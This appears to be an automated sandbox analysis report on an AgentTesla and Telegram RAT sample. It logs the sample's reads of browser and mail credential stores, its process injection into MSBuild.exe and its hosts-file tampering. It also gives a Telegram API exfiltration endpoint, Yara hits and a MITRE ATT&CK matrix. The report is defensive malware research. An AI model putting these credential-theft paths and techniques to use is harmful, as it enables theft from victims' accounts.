                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeQueries volume information: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeQueries volume information: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Modifies the hosts file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.313568492.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.312741390.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.311813738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: Yara matchFile source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.313568492.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.312741390.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.311813738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		212
                    Process Injection                    		1
                    File and Directory Permissions Modification                    		1
                    OS Credential Dumping                    		114
                    System Information Discovery                    		Remote Services11
                    Archive Collected Data                    		Exfiltration Over Other Network Medium1
                    Web Service                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Native API                    		1
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		1
                    Disable or Modify Tools                    		211
                    Input Capture                    		1
                    Query Registry                    		Remote Desktop Protocol1
                    Data from Local System                    		Exfiltration Over Bluetooth11
                    Encrypted Channel                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts1
                    Scheduled Task/Job                    		Logon Script (Windows)1
                    Registry Run Keys / Startup Folder                    		1
                    Deobfuscate/Decode Files or Information                    		Security Account Manager211
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		Automated Exfiltration2
                    Non-Application Layer Protocol                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
                    Obfuscated Files or Information                    		NTDS2
                    Process Discovery                    		Distributed Component Object Model211
                    Input Capture                    		Scheduled Transfer3
                    Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script23
                    Software Packing                    		LSA Secrets131
                    Virtualization/Sandbox Evasion                    		SSH1
                    Clipboard Data                    		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Timestomp                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    Masquerading                    		DCSync1
                    Remote System Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job131
                    Virtualization/Sandbox Evasion                    		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)212
                    Process Injection                    		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                    Hidden Files and Directories                    		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 620228 Sample: SecuriteInfo.com.Trojan.MSI... Startdate: 04/05/2022 Architecture: WINDOWS Score: 100 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 10 other signatures 2->45 6 SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe 3 2->6         started        10 ykVBUY.exe 2 2->10         started        12 ykVBUY.exe 1 2->12         started        process3 file4 23 SecuriteInfo.com.T...Q.MTB.14730.exe.log, ASCII 6->23 dropped 47 Writes to foreign memory regions 6->47 49 Injects a PE file into a foreign processes 6->49 14 MSBuild.exe 17 4 6->14         started        19 conhost.exe 10->19         started        21 conhost.exe 12->21         started        signatures5 process6 dnsIp7 29 api.telegram.org 149.154.167.220, 443, 49768 TELEGRAMRU United Kingdom 14->29 25 C:\Users\user\AppData\Roaming\...\ykVBUY.exe, PE32 14->25 dropped 27 C:\Windows\System32\drivers\etc\hosts, ASCII 14->27 dropped 31 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->31 33 Tries to steal Mail credentials (via file / registry access) 14->33 35 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->35 37 5 other signatures 14->37 file8 signatures9

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe26%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe0%VirustotalBrowse
                    C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe0%MetadefenderBrowse
                    C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe0%ReversingLabs

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    9.0.MSBuild.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    9.0.MSBuild.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                    9.0.MSBuild.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                    9.0.MSBuild.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                    9.2.MSBuild.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    9.0.MSBuild.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    https://api.telegram.org40%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://UhwhaG.com0%Avira URL Cloudsafe
                    http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
